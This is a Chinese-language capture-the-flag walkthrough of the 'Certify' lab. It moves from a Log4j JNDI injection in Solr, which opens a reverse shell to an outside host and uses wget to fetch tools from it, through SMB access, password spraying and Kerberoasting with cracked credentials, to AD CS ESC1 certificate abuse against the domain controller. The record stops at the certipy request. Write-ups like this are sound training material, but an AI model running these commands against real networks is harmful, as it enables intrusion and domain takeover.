Certify

开题 39.98.108.35

一个nginx的界面

flag1

fscan扫描./fscan -h 39.98.108.35

[+] 端口开放 39.98.108.35:8983
[+] 端口开放 39.98.108.35:22
[+] 端口开放 39.98.108.35:80
[*] 网站标题 http://39.98.108.35      状态码:200 长度:612    标题:Welcome to nginx!
[*] 网站标题 http://39.98.108.35:8983 状态码:302 长度:0      标题:无标题 重定向地址: http://39.98.108.35:8983/solr/
[*] 网站标题 http://39.98.108.35:8983/solr/ 状态码:200 长度:16555  标题:Solr Admin

solr存在log4j的组件,直接尝试rce

http://39.98.108.35:8983/solr/admin/cores?action=${jndi:ldap://8.134.149.24:1389/Basic/ReverseShell/8.134.149.24/2333}

存在grc命令可以执行

flag2

查看网络情况

wget 上传fscan和venom

wget http://8.134.149.24:8000/agent_linux_x64

wget http://8.134.149.24:8000/fscan

fscan扫内网,配代理

./fscan -h 172.22.9.19/24

结果如下

172.22.9.26（XIAORANG\DESKTOP-CBKTVMO）

172.22.9.19（外网solr入口点）

172.22.9.47（WORKGROUP\FILESERVER、存在SMB服务）

172.22.9.7（XIAORANG\XIAORANG-DC）

172.22.9.13（XIAORANG\CA01）

smb服务直接登录

拿下flag2和数据库

flag3

在db文件中发现密码以及大量用户名

proxychains crackmapexec smb 172.22.9.1/24 -u user.txt -p pass.txt --continue-on-success 2>/dev/null

获得了两个账号

xiaorang.lab\zhangjian:i9XDE02pLVf
xiaorang.lab\liupeng:fiAzGwEMgTY

但是无法远程登录

根据flag2的提示

由于 Kerberos 认证依赖于 SPN，因此攻击者可能会尝试滥用 SPN 来进行身份验证攻击，比如“Kerberoasting”攻击，利用已配置的 SPN 提取 Kerberos 服务票据，并尝试离线破解服务账户的哈希值。
使用GetUserSPNs.py寻找注册在域用户下的SPN

proxychains python GetUserSPNs.py -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian

hashcat爆破

xiaorang.lab\chenchen	@Passw0rd@
xiaorang.lab\zhangxia	MyPass2@@6

rdp连接，并无发现

查看证书情况

proxychains certipy-ad find -u 'zhangxia@xiaorang.lab' -password 'MyPass2@@6' -dc-ip 172.22.9.7 -vulnerable -stdout

[*] Finding certificate templates
[*] Found 35 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[!] Failed to resolve: XIAORANG-DC.xiaorang.lab
[*] Trying to get CA configuration for 'xiaorang-XIAORANG-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'xiaorang-XIAORANG-DC-CA' via CSRA: [Errno -2] Name or service not known
[*] Trying to get CA configuration for 'xiaorang-XIAORANG-DC-CA' via RRP
[!] Got error while trying to get CA configuration for 'xiaorang-XIAORANG-DC-CA' via RRP: [Errno Connection error (XIAORANG-DC.xiaorang.lab:445)] [Errno -2] Name or service not known
[!] Failed to get CA configuration for 'xiaorang-XIAORANG-DC-CA'
[!] Failed to resolve: XIAORANG-DC.xiaorang.lab
[!] Got error while trying to check for web enrollment: [Errno -2] Name or service not known
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : xiaorang-XIAORANG-DC-CA
    DNS Name                            : XIAORANG-DC.xiaorang.lab
    Certificate Subject                 : CN=xiaorang-XIAORANG-DC-CA, DC=xiaorang, DC=lab
    Certificate Serial Number           : 43A73F4A37050EAA4E29C0D95BC84BB5
    Certificate Validity Start          : 2023-07-14 04:33:21+00:00
    Certificate Validity End            : 2028-07-14 04:43:21+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Unknown
    Request Disposition                 : Unknown
    Enforce Encryption for Requests     : Unknown
Certificate Templates
  0
    Template Name                       : XR Manager
    Display Name                        : XR Manager
    Certificate Authorities             : xiaorang-XIAORANG-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : PublishToDs
                                          IncludeSymmetricAlgorithms
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Encrypting File System
                                          Secure Email
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : XIAORANG.LAB\Domain Admins
                                          XIAORANG.LAB\Domain Users
                                          XIAORANG.LAB\Enterprise Admins
                                          XIAORANG.LAB\Authenticated Users
      Object Control Permissions
        Owner                           : XIAORANG.LAB\Administrator
        Write Owner Principals          : XIAORANG.LAB\Domain Admins
                                          XIAORANG.LAB\Enterprise Admins
                                          XIAORANG.LAB\Administrator
        Write Dacl Principals           : XIAORANG.LAB\Domain Admins
                                          XIAORANG.LAB\Enterprise Admins
                                          XIAORANG.LAB\Administrator
        Write Property Principals       : XIAORANG.LAB\Domain Admins
                                          XIAORANG.LAB\Enterprise Admins
                                          XIAORANG.LAB\Administrator
    [!] Vulnerabilities
      ESC1                              : 'XIAORANG.LAB\\Domain Users' and 'XIAORANG.LAB\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication

直接打会超时，更改hosts

proxychains certipy-ad req -u 'zhangxia@xiaorang.lab' -p 'MyPass2@@6' -target 172.22.9.7 -dc-ip 172.22.9.7 -ca 'xiaorang-XIAORANG-DC-CA' -template 'XR Manager' -upn 'administrator@xiaorang.lab'